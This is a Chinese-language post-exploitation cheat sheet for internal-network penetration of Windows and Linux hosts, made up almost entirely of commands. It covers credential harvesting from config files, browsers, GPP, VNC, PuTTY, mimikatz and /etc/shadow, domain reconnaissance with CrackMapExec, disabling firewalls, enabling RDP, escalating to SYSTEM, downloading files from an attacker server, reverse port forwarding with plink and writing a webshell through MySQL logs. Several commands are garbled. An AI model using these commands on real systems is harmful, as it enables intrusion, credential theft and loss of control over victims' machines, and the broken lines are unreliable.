- 检查其中是否有包含密码的文件
findstr /si password *.xml *.ini *.txt *.config 2>nul 如:pass.txt user.txt 等 如:web.config ,conn.php web.xml等
- 检查其中是否有包含密码的文件
findstr /si password *.xml *.ini *.txt *.config 2>nul findstr /si password *.txt # 查询含有PASSWORD关键字的所有txt findstr /si password *.xml findstr /si password *.ini # 查找文件的位置 C:\> dir /b /s unattend.xml C:\> dir /b /s web.config C:\> dir /b /s sysprep.inf C:\> dir /b /s sysprep.xml C:\> dir /b /s *pass* C:\> dir /b /s vnc.ini
- Windows 自动安装过程中的一些凭证(base64)存储位置
C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml # Metasploit 如下模块也可以获取到 post/windows/gather/enum_unattend # 安装IIS 管理凭证的 web.config可能包含明文密码 文件常见路径 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config C:\inetpub\wwwroot\web.config 文件内容通常如下:
# 包含密码的 groups.xml 文件和其他一些可能存储凭证的文件 C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml \\domain\SYSVOL\\Policies\????\MACHINE\Preferences\Groups\Groups.xml Services\Services.xml ScheduledTasks\ScheduledTasks.xml Printers\Printers.xml Drives\Drives.xml DataSources\DataSources.xml
- PowerShell获取剪贴板信息
PowerShell获取剪贴板信息脚本 下载地址
- 内网渗透提权exp补丁对比工具
内网渗透提权exp补丁对比工具 下载地址
- 探测等级1
net group "Domain Admins" /domain
- 探测等级2
for /f %i in (1.txt) do net user %i /domain >>user.txt
- 获取本地共享信息
net view /a \%COMPUTERNAME%
- 查看本机共享信息
net share
- 利用wmic查找共享
wmic share get name,path,status
- 查看连接驱动
net use wmic logicaldisk get caption,description,providername
- 使用accesschk查看权限配置较弱的服务,以及能否重新配置
accesschk.exe -uwcqv "Everyone" * accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwcqv "Users" *
- 查看未引用的服务路径
wmic service get name.displayname,pathma,e,startmode 2>nul | findstr /i "Auto" 2>nul | findstr /i /v "C:\Windows\\" 2>nul | findstr /i /v """
- 本地端口开放与连接信息
netstat -ano
- 阿里云列出IIS的站点信息
%windir%\system32\inetsrv\AppCmd.exe list site
- 保存系统上所有注册表信息
reg export HKLM hklm.reg reg export HKCU hkcu.reg reg export HKCU hkcr.reg reg export HKCU hku.reg reg export HKCU hkcc.reg
- 查询本机所有的盘符
wmic logicaldisk get description,name,size,freespace /value fsutil fsinfo drives fsutil fsinfo volumeinfo C:|findstr "卷名" 查看卷名称,需要管理员权限
- empire收集信息,管理员权限
usemodule powershell/situational_awareness/host/winenum
- 查看杀毒软件
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
- 查看当前机器的进程信息
tasklist /svc # 显示当前机器所有的进程所对应的服务 [只限于当前用户有权限看到的进程] tasklist /m # 显示本地所有进程所调用的dll [同样只限于当前用户有权限看到的进程] tasklist /v # 寻找进程中有无域管启用的进程,或者杀软进程 taskkill /im iexplore.exe /f # 用指定进程名的方式强行结束指定进程
- 指定目录下搜集各类敏感文件
dir /a /s /b d:\"*.txt" dir /a /s /b d:\"*.xml" dir /a /s /b d:\"*.mdb" dir /a /s /b d:\"*.sql" dir /a /s /b d:\"*.mdf" dir /a /s /b d:\"*.eml" dir /a /s /b d:\"*.pst" dir /a /s /b d:\"*conf*" dir /a /s /b d:\"*bak*" dir /a /s /b d:\"*pwd*" dir /a /s /b d:\"*pass*" dir /a /s /b d:\"*login*" dir /a /s /b d:\"*user*"
- 指定目录下的文件中搜集各种账号密码
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak findstr /si user *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
- 查看,删除 指定文件
type c:\windows\temp\admin_pass.bak # 查看某个文件内容 del d:\ad\*.* /a /s /q /f # 强制删除指定路径下的所有文件 tree /F /A D:\ >> file_list.txt # 导出指定路径下的文件目录结构 rd /q/s c:\windows\temp\test # 删除文件夹
- 历史凭证信息收集
引用自:https://github.com/klionsec/RedTeamer 批量抓取当前机器上的 "各类基础服务配置文件中保存的各种账号密码" 比如,各种数据库连接配置文件,各类服务自身的配置文件(redis,http basic...)... 想办法 "控制目标 运维管理 / 技术人员 的单机,从这些机器上去搜集可能保存着各类敏感网络资产的账号密码表" 比如, *.ls,*.doc,*.docx, *.txt.... 抓取各类 "数据库客户端工具中保存各种数据库连接账号密码 比如,Navicat,SSMS[MSSQL自带客户端管理工具,里面也可能保存的有密码(加密后的base64)] 抓取当前系统 "注册表中保存的各类账号密码hash" [ Windows ] 抓取当前系统所有 "本地用户的明文密码/hash" [ Windows & linux ] 抓取当前系统的所有 "用户token" [ Windows ] 抓取 "windows凭据管理器中保存的各类连接账号密码" 抓取 "MSTSC 客户端中保存的所有rdp连接账号密码" 抓取各类 "VNC客户端工具中保存的连接密码" 抓取 "GPP目录下保存的各类账号密码" [ 包括组策略目录中XML里保存的密码hash 和 NETLOGON目录下的某些脚本中保存的账号密码 ] 抓取各类 "SSH客户端工具中保存的各种linux系统连接账号密码", SecureCRT,Xshell,WinSCP,putty 抓取各类 "浏览器中保存的各种web登录密码和cookie信息",Chrome [360浏览器],Firefox,IE,QQ浏览器 抓取各类 "数据库表中保存的各类账号密码hash" 抓取各类 "FTP客户端工具中保存的各种ftp登录账号密码", filezila, xftp... 抓取各类 "邮件客户端工具中保存的各种邮箱账号密码", forxmail, thunderbird... 抓取各类 "SVN客户端工具中保存的所有连接账号密码及项目地址" 抓取各类 "VPN客户端工具中保存的各种链接账号密码"
- 利用工具CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec
#CrackMapExec 列出共享 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --shares 列出会话 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --sessions 列出磁盘信息 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --disks 列出登录的用户 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --loggedon-users 列出域用户 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --users 根据唯一的RID列出所有的用户 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --rid-brute 列出域组 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --groups 列出本地组 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --local-groups 列出域密码策略 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --pass-pol 尝试空会话 cme smb 192.168.127.235 -u '' -p '' 列出指定域信息 cme smb 192.168.127.235 -u admin -p 'xxxeeee' -d LABNET 列出ntds.dit的历史信息 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --ntds-history 爬行C盘目录信息 cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$ --pattern txt cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$
- Lazagne
LaZagne一个收集密码工具-LaZagne,每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码,这个工具是用来获取存储在本地计算机上的密码,诸如浏览器密码等等
https://github.com/AlessandroZ/LaZagne
- psloggedon
查看本地登陆的用户和通过本地计算机或远程计算机登陆过的用户。如果指定的是用户名而不是计算机名,程序会搜索网上邻居中的计算机。原理是通过检查注册表HKEY_USERS的key值来查询谁登陆过。某些功能需要管理权限
PS:日志是本地机器的管理员日志,可以用脚本或者内置应用wevtutil导出来看,工具:psloggedon.exe,netview.exe,PVEFindADUser.exe,powersploit的PowerView脚本,Empire的user_hunter模块
https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon
- psexec
psexec针对远程建立连接的认证方式有两种,一种先建立ipc连接,然后直接用psexec \10.10.10.10 cmd命令开启一个半交互式的cmdshell,另一种是在psexec的参数中指定账号密码。
https://github.com/poweradminllc/PAExec
psexec \\10.10.10.10 c:\file.bat
- 利用powershell收集域信息
Set-ExecutionPolicy RemoteSigned #开启RemoteSigned权限 Import-Module .\PowerView.ps1
- 读取浏览器里存储的密码的工具【WebBrowserPassView】
支持IE4.0~11.0,火狐全版本、Chrome、Safari和Opera浏览器里的密码
WebBrowserPassView 下载地址
- 浏览器 firefox
%appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\logins.json %appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\key3.db %appdata%\Roaming\Mozilla\Firefox\Profiles\*.defualt\place.sqlite
- 浏览器 chrome
// chrome记住密码保存的数据库位置 %LocalAppData%\Google\Chrome\User Data\Default\Login Data
- Mail PassView【邮件客户端读取密码 mailpv】
Mail PassView 下载地址
该工具支持全版本的windows操作系统,支持如下客户端: Outlook Express Microsoft Outlook 2000 (POP3 和 SMTP 账户) Microsoft Outlook 2002/2003/2007/2010/2013 (POP3, IMAP, HTTP 和 SMTP 账户) Windows Mail Windows Live Mail IncrediMail Eudora Netscape 6.x/7.x Mozilla Thunderbird Group Mail Free Yahoo! Mail Hotmail/MSN mail Gmail
- 3389远程桌面登陆密码工具【rdpv】
rdpv 下载地址
读取保存在.rdp文件中的远程桌面密码
- MessenPASS【读取一些社交软件客户端里存储的密码】
mspass 下载地址
读取一些社交软件客户端里存储的密码。目前支持的客户端有: MSN Messenger Windows Messenger (仅支持dows XP) Windows Live Messenger (仅支持ndows XP/Vista/7) Yahoo Messenger (Versions 5.x and 6.x) Google Talk ICQ Lite 4.x/5.x/2003 AOL Instant Messenger Trillian Trillian Astra Miranda GAIM/Pidgin MySpace IM PaltalkScene Digsby
- 读取密码mimikatz
dpapi::cred/in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\92FB159ED290FC523E845094404697A
- ie代理获取
reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v ProxyServer reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"
通过PCA文件查看执行如下语句
reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternet Settings" /v AutoConfigURL
- 查找本地的Credentials
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
- 第三方软件
McAfee
McAfee 的加密凭证存储在 sitelist.xml 文件中
%AllUsersProfile%Application Data\McAfee\Common Framework\SiteList.xml
VNC
UltraVNC
[ultravnc] passwd=5FAEBBD0EF0A2413
RealVNC
RealVNC 的密码可以直接在注册表进行查询
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
Putty
reg query" HKCU\Software\SimonTatham\PuTTY\Sessions"
- PowerSploit 相关的模块
PowerSploit 也可以用于发现存储的凭证,以下模块支持检查各种文件和注册表中的加密凭证和 plain-text
Get-UnattendedInstallFile Get-Webconfig Get-ApplicationHost Get-SiteListPassword Get-CachedGPPPassword Get-RegistryAutoLogon
- 查看本地的计划任务
at或schtask
- 查看计划任务信息(如果资源无法加载问题,是由于当前活动页码所致,将页码修改未437即可:chcp 437)
schtasks /query /fo LIST /v
- 查看计划任务和自定义实现
schtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks PS:(无法加载列资源,将编码设为chcp 437)
- 查看主机开机时间
net statistics workstation
- 查看计划任务信息
schtasks /query /fo LIST /v
- 查看启动项
wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
- AlwaysInstallElevated是否启用
reg query HKCU\Software\Microsoft\Windows\Installer /v AlwaysInstallElevated
- 查看tcp/udp网络连接状态信息
netstat -ano # 查看本机所有的tcp,udp端口连接及其对应的pid netstat -anob # 查看本机所有的tcp,udp端口连接,pid及其对应的发起程序 netstat -ano | findstr "ESTABLISHED" # 查看当前正处于连接状态的端口及ip netstat -ano | findstr "LISTENING" # 查看当前正处于监听状态的端口及ip netstat -ano | findstr "TIME_WAIT" # 查看当前正处于等待状态的端口及ip
- 基于icmp,探测主机
for /L %I in (0,1,254) DO @ping -w 1 -n 1 192.168.7.%I | findstr "TTL=" >> pinglive.txt
PS:常用的工具[最多10秒一个c段]:nbtscan[基于smb和netbios的内网主机发现方式]、Ladon、自开发工具
socks代理扫描:Goby
- 查询进程
tasklist /wmic process list brief
- 查询本机服务
wmic service list brief
- 检查防火墙
netsh firewall show state # 查看防火墙状态 netsh firewall show config # 查看防火墙配置 netsh advfirewall firewall show rule name=all netsh advfirewall export "firewall.txt"
- 关闭防火墙
Windows Server 2003系统及以前版本 netsh firewall set opmode disable Windows server 2003之后系统版本 netsh advfirewall set allprofiles state off
- 查询防火墙配置
netsh firewall show config
- 修改防火墙配置
Windows Server 2003系统及之前版本,允许指定程序全部链接 netsh firewall add allowedprogram c:\nc.exe "allow nc" enable Windows server 2003 之后系统版本 允许指定程序连入 netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" 允许指定程序连出 netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe" 允许 3389 端口放行 netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
- 自定义防火墙日志存储位置
netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"
- 开启远程桌面连接
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
- 查看远程连接端口
在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
- Windows 7下获取System权限
sc create syscmd binPath= "cmd /K start" type= own type=interact // 创建任务 net start syscmd // 运行 syscmd 任务 sc delete syscmd // 删除 syscmd 任务
工作组采取的一般都是常规渗透方法,因为工作组一般都是个人和少数服务器。
扫描网段中的web服务,常用的有phpstudy,wampserver等,来寻找搭建的服务漏洞
扫描开放端口信息,以及对应的服务,判断是否存在漏洞。
扫描主机由于没有更新到最新版本导致的系统漏洞,比如MS17-010,补丁号为KB4013389
hash抓取,hash注入,hash碰撞,口令爆破,IPC登陆,WMI,未授权访问,文件共享系统。
ARP嗅探/欺骗攻击(Cain和Ettercap)
DNS劫持,会话劫持。
社会工程学
...
- 查看当前机器的环境变量配置,看有没有我们可以直接利用到的语言环境
set
- 查看当前机器的NT内核版本,不弹窗
ver
- 查看当前机器的NT内核版本,弹窗,在非图形界面不执行这个命令
winver
- 列出当前机器上的所有盘符
fsutil fsinfo drives
- 查看当前机器开启的共享
net share
- 查看当前机器安装的驱动列表
driverquery
- 设置共享
net share public_dir="c:\public" /grant:Everyone,Full
- 找当前用户可读写目录,可能会很多
dir /a-r-d /s /b
分割线
【内网渗透】凭据收集总结
分割线
所有版本
uname -a hostname
内核版本信息
uname -r uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz- PS:知道版本号后,用kali 搜索相关的漏洞 命令: searchsploit -w ubuntu 16.04 4.4.x
系统主机名字
uname -n
Linux内核架构
uname -m
查看内核信息
cat /proc/version
查看cpu信息
cat /proc/cpuinfo
发布信息
cat /etc/*-release | cat /etc/issue
主机名
hostname
文件系统
df -a
内核日志
dmesg / /var/log/dmesg
当前用户
whoami
当前用户信息
id
- 当前组
groups
- 显示目前登录系统的用户信息
who
- 查找SUID 文件
find / -perm -u=s 2>/dev/null
- 查找执行哪些 sudo 命令无需密码
sudo -l
PS:sudo 执行的文件,提权辅助:https://gtfobins.github.io/
- 当前用户可用的所有命令
compgen -c
查看系统所有用户
cat /etc/passwd
查看系统都有组
cat /etc/group
查看所有用户hash(需root)
cat /etc/shadow
- freebsd系统中也有类似sudo的机制,称作doas
cat /etc/doas.conf
查询用户基本信息
finger
当前登录的用户
w #目前登录的用户
users | who -a | /var/log/utmp
登录过的用户
last | /var/log/wtmp
显示系统中所有用户最近一次登录信息
lastlog | /var/log/lastlog
登录成功日志
cat /var/log/secure
登录失败日志
/var/log/faillog
特权用户查看
grep :0 /etc/passwd
查看passwd最后修改时间
ls -l /etc/passwd
查看是否存在空口令用户
awk -F: 'length($2)==0 {print $1}' /etc/shadow
查看远程登录的用户
awk '/\$1|\$6/{print $1}' /etc/shadow
查看具有sudo权限的用户
cat /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
可以使用sudo提升到root的用户(root)
cat /etc/sudoers
列出目前用户可执行与无法执行的指令
sudo -l
- 查看邮件
ls -alh /var/mail/
系统环境信息
env
系统环境变量信息
set
环境变量的路径信息
echo $PATH
打印历史命令
history / ~/.bash_history
显示当前路径
pwd
显示默认系统遍历
cat /etc/profile
显示可用shell
cat /etc/shells
显示进程信息
ps aux ps -ef
系统资源使用情况(
总览系统全面信息命令,Ctrl + C 退出界)
top -c top
查看进程关联文件
lsof -c $PID
完整命令行信息
/proc/$PID/cmdline
进程的命令名
/proc/$PID/comm
进程当前工作目录的符号链接
/proc/$PID/cwd
运行程序的符号链接
/proc/$PID/exe
进程的环境变量
/proc/$PID/environ
进程打开文件的情况
/proc/$PID/fd
由inetd管理的服务列表
cat /etc/inetd.conf
由xinetd管理的服务列表
cat /etc/xinetd.conf
nfs服务器的配置
cat /etc/exports
邮件信息
/var/log/mailog
ssh配置
sshd_config
显示指定用户的计划任务
crontab -l -u %user% /var/spool/cron/* /var/spool/anacron/* /etc/crontab /etc/anacrontab /etc/cron.* /etc/anacrontab
开机启动项
/etc/rc.d/init.d/ ls /etc/rc.d/init.d/
- 查看开机启动服务命令
chkconfig
- 查看 rc 启动文件
cat /etc/rc.local crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
列出网卡接口信息
ip addr show | /sbin/ifconfig -a
列出网络接口信息
cat /etc/network/interfaces
查看系统arp表
arp -a
路由信息
route / ip ro show
查看dns信息
cat /etc/resolv.conf
本地端口开放信息
netstat -an
列出iptables 配置规则
iptables -L
端口服务映射
cat /etc/services
主机名
hostname
PID #查看进程端口情况
netstat -anltp | grep
- 显示和操作IP路由表
route
- 显示核心路由表
ip route
- 显示邻居表
ip neigh
- 查看DNS
cat /etc/resolv.conf
rpm -qa --last #Redhat
yum list | grep installed #CentOS
ls -l /etc/yum.repos.d/
ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
dpkg -l #Debian
cat /etc/apt/sources.list #Debian APT
pkg_info #xBSD
pkginfo #Solaris
pacman -Q #Arch Linux
最近5天的文件
find / -ctime +1 -ctime -5
~/.ssh
/etc/ssh
/var/log/boot.log
/var/log/cron
/var/log/faillog
/var/log/lastlog
/var/log/messages
/var/log/secure
/var/log/syslog
/var/log/wtmp
/var/run/utmp
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
mkdir /root/.john
cd /root/.john
unshadow passwd.txt shadow.txt > hash.txt
PS:
- 在提权过程中,你需要将文件放到你的目标上
Powershell Cmdlet(Powershell 3.0及更高版本):
Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
Powershell One-Liner:
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename","C:\Windows\Temp\filename")
- 开放SMB 端口转发
plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS
- 慢日志写SHell
set global general_log='on'
set global general_log_file='D:\\phpStudy4IIS\\WWW\\slow_log.php' #一定要使用 '\\'
select ""
参考链接:
https://mp.weixin.qq.com/s/0-UpfCvUVzXZkTAEHHrdhQ
https://github.com/ZTHacker/Penetration_orders
https://mp.weixin.qq.com/s/LnjKK1YJ7BvMXPuFbeq37w
https://mp.weixin.qq.com/s/DNJPQdHzBSYx0s3YcPFOiQ
https://mp.weixin.qq.com/s/zQmd2QeiK4Ggkx6rLH724A
https://mp.weixin.qq.com/s/9ZwsdxGXscUv59oFpDhfIQ
https://mp.weixin.qq.com/s/7_XGgcUnGE8N73qP-tKjtg
https://mp.weixin.qq.com/s/I8sfpRvtQWP7GiqSILwcaw
https://mp.weixin.qq.com/s/pK4j81VuUh4WuOiJ26uJHQ
https://mp.weixin.qq.com/s/D6QLlN5ew8IbUp32TznUAQ
https://mp.weixin.qq.com/s/eX6RmlcinT8nKXkEgbdTlA
https://mp.weixin.qq.com/s/f0dyixyPpGujWuWWwbLDqQ
https://mp.weixin.qq.com/s/30xOtFsstX4wemiRKoMMwQ
虽然我们生活在阴沟里,但依然有人仰望星空!